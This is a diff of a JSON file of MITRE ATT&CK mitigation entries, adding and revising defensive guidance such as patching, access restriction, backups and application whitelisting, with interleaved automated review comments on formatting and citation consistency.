+ "description": "Evaluate the security of third-party software that could be used to deploy or execute programs. Ensure that access to management systems for deployment systems is limited, monitored, and secure. Have a strict approval policy for use of deployment systems.\n\nGrant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068). \n\nIf the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.",
 "meta": {
 "external_id": "T1072",
 "refs": [
@@ -2819,6 +3088,26 @@
 "uuid": "7a4d0054-53cd-476f-88af-955dddc80ee0",
 "value": "Drive-by Compromise Mitigation - T1189"
 },
+ {
+ "description": "Mitigation of this technique with preventative controls may impact the adversary's decision process depending on what they're looking for, how they use the information, and what their objectives are. Since it may be difficult to mitigate all aspects of information that could be gathered, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.",
+ "meta": {
+ "external_id": "T1497",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1497"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "c4585911-6ecf-47b6-aa6b-a2bae30fd3f7",
+ "value": "Virtualization/Sandbox Evasion Mitigation - T1497"
+ },
 {
 "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)",
 "meta": {
@@ -2841,7 +3130,7 @@
 "value": "Data Obfuscation Mitigation - T1001"
 },
 {
- "description": "Ensure that externally facing Web servers are patched regularly to prevent adversary access through [Exploitation of Vulnerability](https://attack.mitre.org/techniques/T1068) to gain remote code access or through file inclusion weaknesses that may allow adversaries to upload files or scripts that are automatically served as Web pages. \n\nAudit account and group permissions to ensure that accounts used to manage servers do not overlap with accounts and permissions of users in the internal network that could be acquired through Credential Access and used to log into the Web server and plant a Web shell or pivot from the Web server into the internal network. (Citation: US-CERT Alert TA15-314A Web Shells)",
+ "description": "Ensure that externally facing Web servers are patched regularly to prevent adversary access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) to gain remote code access or through file inclusion weaknesses that may allow adversaries to upload files or scripts that are automatically served as Web pages. \n\nAudit account and group permissions to ensure that accounts used to manage servers do not overlap with accounts and permissions of users in the internal network that could be acquired through Credential Access and used to log into the Web server and plant a Web shell or pivot from the Web server into the internal network. (Citation: US-CERT Alert TA15-314A Web Shells)",
 "meta": {
 "external_id": "T1100",
 "refs": [
@@ -3119,13 +3408,6 @@
 ],
 "type": "mitigates"
 },
- {
- "dest-uuid": "fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
 {
 "dest-uuid": "a5de0540-73e7-4c67-96da-4143afedc7ed",
 "tags": [
@@ -3133,20 +3415,6 @@
 ],
 "type": "mitigates"
 },
- {
- "dest-uuid": "f58cd69a-e548-478b-9248-8a9af881dc34",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "d731c21e-f27d-4756-b418-0e2aaabd6d63",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
 {
 "dest-uuid": "633baf01-6de4-4963-bb54-ff6c6357bed3",
 "tags": [
@@ -3154,23 +3422,45 @@
 ],
 "type": "mitigates"
 },
+ {
+ "dest-uuid": "f58cd69a-e548-478b-9248-8a9af881dc34",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
 {
 "dest-uuid": "3b0b604f-10db-41a0-b54c-493124d455b9",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "mitigates"
+ },
+ {
+ "dest-uuid": "d731c21e-f27d-4756-b418-0e2aaabd6d63",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
+ {
+ "dest-uuid": "fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
 }
 ],
 "uuid": "8220b57e-c400-4525-bf69-f8edc6b389a8",
 "value": "Encrypt Network Traffic - M1009"
 },
 {
- "description": "Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Use multifactor authentication. Follow best practices for mitigating access to [Valid Accounts](https://attack.mitre.org/techniques/T1078)",
+ "description": "Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. \nToo strict a policy can create a denial of service condition and render environments un-usable, with all accounts being locked-out permanently. Use multifactor authentication. Follow best practices for mitigating access to [Valid Accounts](https://attack.mitre.org/techniques/T1078)\n\nRefer to NIST guidelines when creating passwords.(Citation: NIST 800-63-3)\n\nWhere possible, also enable multi factor authentication on external facing services.",
 "meta": {
 "external_id": "T1110",
 "refs": [
- "https://attack.mitre.org/techniques/T1110"
+ "https://attack.mitre.org/techniques/T1110",
+ "https://pages.nist.gov/800-63-3/sp800-63b.html"
 ]
 },
 "related": [
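Review bot: The new T1110 description separates its added lockout caveat with a single `\n` (`being guessed. \nToo strict a policy`) while every other paragraph break in this and the neighbouring descriptions uses `\n\n`, so the rendered Markdown will run the caveat into the first paragraph; a consistent `\n\n` keeps the output uniform. The same text now recommends multifactor authentication twice, once as `Use multifactor authentication.` and again as `enable multi factor authentication on external facing services`, with two spellings of the term; one merged sentence would read better. The relationship reordering at the top of this hunk belongs to the M1009 entry, whose object starts outside the hunk. If this text is copied verbatim from upstream ATT&CK, the cleanup belongs there rather than in this file.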
@@ -3362,6 +3652,26 @@
 "uuid": "2d704e56-e689-4011-b989-bf4e025a8727",
 "value": "Plist Modification Mitigation - T1150"
 },
+ {
+ "description": "The creation and modification of systemd service unit files is generally reserved for administrators such as the Linux root user and other users with superuser privileges. Limit user access to system utilities such as systemctl to only users who have a legitimate need. Restrict read/write access to systemd unit files to only select privileged users who have a legitimate need to manage system services. Additionally, the installation of software commonly adds and changes systemd service unit files. Restrict software installation to trusted repositories only and be cautious of orphaned software packages. Utilize malicious code protection and application whitelisting to mitigate the ability of malware to create or modify systemd services. ",
+ "meta": {
+ "external_id": "T1501",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1501"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0fff2797-19cb-41ea-a5f1-8a9303b8158e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "83130e62-bca6-4a81-bd4b-8e233bd49db6",
+ "value": "Systemd Service Mitigation - T1501"
+ },
 {
 "description": "Networks that allow for open development and testing of Web content and allow users to set up their own Web servers on the enterprise network may be particularly vulnerable if the systems and Web servers are not properly secured to limit privileged account use, unauthenticated network share access, and network/system isolation.\n\nEnsure proper permissions on directories that are accessible through a Web server. Disallow remote access to the webroot or other directories used to serve Web content. Disable execution on directories within the webroot. Ensure that permissions of the Web server process are only what is required by not using built-in accounts; instead, create specific accounts to limit unnecessary access or permissions overlap across multiple systems. (Citation: acunetix Server Secuirty) (Citation: NIST Server Security July 2008)",
 "meta": {
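Review bot: The new T1501 description ends with a trailing space inside the string (`create or modify systemd services. "`), and the T1078 and T1495 descriptions changed later in this patch end the same way. Trailing whitespace inside a JSON string is harmless to parsers but makes otherwise identical descriptions compare unequal and produces noisy diffs on the next regeneration, so strip it here, or, if this cluster is produced from upstream STIX data, normalize it in the generator. The description also carries the usual `Citation:` markers nowhere, which is consistent with the single `refs` entry, so no ref is missing for this entry.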
@@ -3872,6 +4182,26 @@
 "uuid": "4320b080-9ae9-4541-9b8b-bcd0961dbbbd",
 "value": "Data Staged Mitigation - T1074"
 },
+ {
+ "description": "This technique likely should not be mitigated with preventative controls because it may protect unintended targets from being compromised. If targeted, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.",
+ "meta": {
+ "external_id": "T1480",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1480"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "853c4192-4311-43e1-bfbb-b11b14911852",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "c61e2da1-f51f-424c-b152-dc930d4f2e70",
+ "value": "Environmental Keying Mitigation - T1480"
+ },
 {
 "description": "This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific Windows API calls will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior. (Citation: GDSecurity Linux injection)\n\nIdentify or block potentially malicious software that may contain process injection functionality by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)\n\nUtilize Yama (Citation: Linux kernel Yama) to mitigate ptrace based process injection by restricting the use of ptrace to privileged users only. Other mitigation controls involve the deployment of security kernel modules that provide advanced access control and process restrictions such as SELinux (Citation: SELinux official), grsecurity (Citation: grsecurity official), and AppAmour (Citation: AppArmor official).",
 "meta": {
@@ -3979,14 +4309,15 @@
 "value": "Account Discovery Mitigation - T1087"
 },
 {
- "description": "Take measures to detect or prevent techniques such as [Credential Dumping](https://attack.mitre.org/techniques/T1003) or installation of keyloggers to acquire credentials through [Input Capture](https://attack.mitre.org/techniques/T1056). Limit credential overlap across systems to prevent access if account credentials are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled and use of accounts is segmented, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access). Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege)",
+ "description": "Take measures to detect or prevent techniques such as [Credential Dumping](https://attack.mitre.org/techniques/T1003) or installation of keyloggers to acquire credentials through [Input Capture](https://attack.mitre.org/techniques/T1056). Limit credential overlap across systems to prevent access if account credentials are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled and use of accounts is segmented, as this is often equivalent to having a local administrator account with the same password on all systems. \n\nFollow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access) \n\nAudit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) These audits should also include if default accounts have been enabled, or if new local accounts are created that have not be authorized. \n\nApplications and appliances that utilize default username and password should be changed immediately after the installation, and before deployment to a production environment. (Citation: US-CERT Alert TA13-175A Risks of Default Passwords on the Internet) When possible, applications that use SSH keys should be updated periodically and properly secured. ",
 "meta": {
 "external_id": "T1078",
 "refs": [
 "https://attack.mitre.org/techniques/T1078",
+ "https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach",
 "https://technet.microsoft.com/en-us/library/dn535501.aspx",
 "https://technet.microsoft.com/en-us/library/dn487450.aspx",
- "https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach"
+ "https://www.us-cert.gov/ncas/alerts/TA13-175A"
 ]
 },
 "related": [
@@ -4140,7 +4471,7 @@
 "value": "Email Collection Mitigation - T1114"
 },
 {
- "description": "Users need to be trained to know which programs ask for permission and why. Follow mitigation recommendations for [AppleScript](https://attack.mitre.org/techniques/T1155).",
+ "description": "This technique exploits users' tendencies to always supply credentials when prompted, which makes it very difficult to mitigate. Use user training as a way to bring awareness and raise suspicion for potentially malicious events (ex: Office documents prompting for credentials).",
 "meta": {
 "external_id": "T1141",
 "refs": [
@@ -4632,6 +4963,27 @@
 "uuid": "6e7db820-9735-4545-bc64-039bc4ce354b",
 "value": "LC_MAIN Hijacking Mitigation - T1149"
 },
+ {
+ "description": "Implementing best practices for websites such as defending against [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) (Citation: OWASP Top 10 2017). Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. (Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.",
+ "meta": {
+ "external_id": "T1491",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1491",
+ "https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "5909f20f-3c39-4795-be06-ef1ea40d350b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "5d8507c4-603e-4fe1-8a4a-b8241f58734b",
+ "value": "Defacement Mitigation - T1491"
+ },
 {
 "description": "Since StartupItems are deprecated, preventing all users from writing to the /Library/StartupItems directory would prevent any startup items from getting registered. Similarly, appropriate permissions should be applied such that only specific users can edit the startup items so that they can’t be leveraged for privilege escalation.",
 "meta": {
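Review bot: The new T1491 description cites `(Ready.gov IT DRP)` without the `Citation:` prefix used by every other citation in the file, and unlike the T1492 and T1488 entries added in this patch its `refs` array does not carry the matching URL, so the citation has nothing to resolve to. Change the text to `(Citation: Ready.gov IT DRP)` and add `"https://www.ready.gov/business/implementation/IT"` to `refs`, as the sibling entries do. The opening sentence, `Implementing best practices for websites such as defending against ...`, has no main verb; `Implement best practices ...` would fix it. If the description is mirrored from upstream ATT&CK, these are defects to report upstream rather than patch only here.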
@@ -4827,6 +5179,111 @@
 "uuid": "797312d4-8a84-4daf-9c56-57da4133c322",
 "value": "Trusted Relationship Mitigation - T1199"
 },
+ {
+ "description": "Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS and device firmware to determine if it is vulnerable to modification. Patch the BIOS and other firmware as necessary to prevent successful use of known vulnerabilities. ",
+ "meta": {
+ "external_id": "T1495",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1495"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "f5bb433e-bdf6-4781-84bc-35e97e43be89",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "70886857-0f19-4caa-b081-548354a8a994",
+ "value": "Firmware Corruption Mitigation - T1495"
+ },
+ {
+ "description": "Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)",
+ "meta": {
+ "external_id": "T1496",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1496",
+ "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599",
+ "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html",
+ "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm",
+ "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx",
+ "https://technet.microsoft.com/en-us/library/ee791851.aspx"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "46acc565-11aa-40ba-b629-33ba0ab9b07b",
+ "value": "Resource Hijacking Mitigation - T1496"
+ },
+ {
+ "description": "Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.\n\nIdentify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)",
+ "meta": {
+ "external_id": "T1488",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1488",
+ "https://www.ready.gov/business/implementation/IT",
+ "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599",
+ "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html",
+ "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm",
+ "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx",
+ "https://technet.microsoft.com/en-us/library/ee791851.aspx"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
+ {
+ "dest-uuid": "2e114e45-2c50-404c-804a-3af9564d240e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
+ {
+ "dest-uuid": "b82f7d37-b826-4ec9-9391-8e121c78aed7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "0b3ee33e-430b-476f-9525-72d120c90f8d",
+ "value": "Data Destruction Mitigation - T1488"
+ },
+ {
+ "description": "Ensure proper process, registry, and file permissions are in place to inhibit adversaries from disabling or interfering with critical services. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Harden systems used to serve critical network, business, and communications functions. Operate intrusion detection, analysis, and response systems on a separate network from the production environment to lessen the chances that an adversary can see and interfere with critical response functions.",
+ "meta": {
+ "external_id": "T1489",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1489"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "417fed8c-bd76-48b5-90a2-a88882a95241",
+ "value": "Service Stop Mitigation - T1489"
+ },
 {
 "description": "Limit privileges of user accounts so only authorized users can edit the rc.common file.",
 "meta": {
@@ -4848,7 +5305,7 @@
 "value": "Rc.common Mitigation - T1163"
 },
 {
- "description": "Regsvcs and Regasm may not be necessary within a given environment. Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuess by adversaries.",
+ "description": "Regsvcs and Regasm may not be necessary within a given environment. Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuse by adversaries.",
 "meta": {
 "external_id": "T1121",
 "refs": [
@@ -4883,69 +5340,6 @@ ], "type": "mitigates" }, - { - "dest-uuid": "29e07491-8947-43a3-8d4e-9a787c45f3d3", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "f1c3d071-0c24-483d-aca0-e8b8496ce468", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "b332a960-3c04-495a-827f-f17a5daed3a6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "dfe29258-ce59-421c-9dee-e85cb9fa90cd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "88932a8c-3a17-406f-9431-1da3ff19f6d6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "2d646840-f6f5-4619-a5a8-29c8316bbac5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, { "dest-uuid": "3b0b604f-10db-41a0-b54c-493124d455b9", "tags": [ 
@@ -4953,34 +5347,6 @@ ], "type": "mitigates" }, - { - "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "a0464539-e1b7-4455-a355-12495987c300", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "fd339382-bfec-4bf0-8d47-1caedc9e7e57", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, { "dest-uuid": "ef771e03-e080-43b4-a619-ac6f84899884", "tags": [ @@ -4989,7 +5355,21 @@ "type": "mitigates" }, { - "dest-uuid": "46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "dest-uuid": "a0464539-e1b7-4455-a355-12495987c300", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "f1c3d071-0c24-483d-aca0-e8b8496ce468", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "2d646840-f6f5-4619-a5a8-29c8316bbac5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -5001,6 +5381,83 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" + }, + { + "dest-uuid": "b332a960-3c04-495a-827f-f17a5daed3a6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "29e07491-8947-43a3-8d4e-9a787c45f3d3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "88932a8c-3a17-406f-9431-1da3ff19f6d6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" } ], "uuid": 
"bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", @@ -5023,14 +5480,14 @@ "type": "mitigates" }, { - "dest-uuid": "c5089859-b21f-40a3-8be4-63e381b8b1c0", + "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" }, { - "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d", + "dest-uuid": "c5089859-b21f-40a3-8be4-63e381b8b1c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5057,21 +5514,35 @@ "type": "mitigates" }, { - "dest-uuid": "82f04b1e-5371-4a6f-be06-411f0f43b483", + "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" }, { - "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", + "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" }, { - "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", + "dest-uuid": "bd4d32f5-eed4-4018-a649-40b229dd1d69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "198ce408-1470-45ee-b47f-7056050d4fc2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -5084,6 +5555,48 @@ ], "type": "mitigates" }, + { + "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "d731c21e-f27d-4756-b418-0e2aaabd6d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "62adb627-f647-498e-b4cc-41499361bacb", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "82f04b1e-5371-4a6f-be06-411f0f43b483", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, { "dest-uuid": "ef771e03-e080-43b4-a619-ac6f84899884", "tags": [ 
@@ -5091,6 +5604,104 @@ ], "type": "mitigates" }, + { + "dest-uuid": "8f142a25-f6c3-4520-bd50-2ae3ab50ed3e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "8e27551a-5080-4148-a584-c64348212e4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "29e07491-8947-43a3-8d4e-9a787c45f3d3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "d9e88203-2b5d-405f-a406-2933b1e3d7e4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "d9db3d46-66ca-44b4-9daa-1ef97cb7465a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "8f0e39c6-82c9-41ec-9f93-5696c0f2e274", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "2204c371-6100-4ae0-82f3-25c07c29772a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + 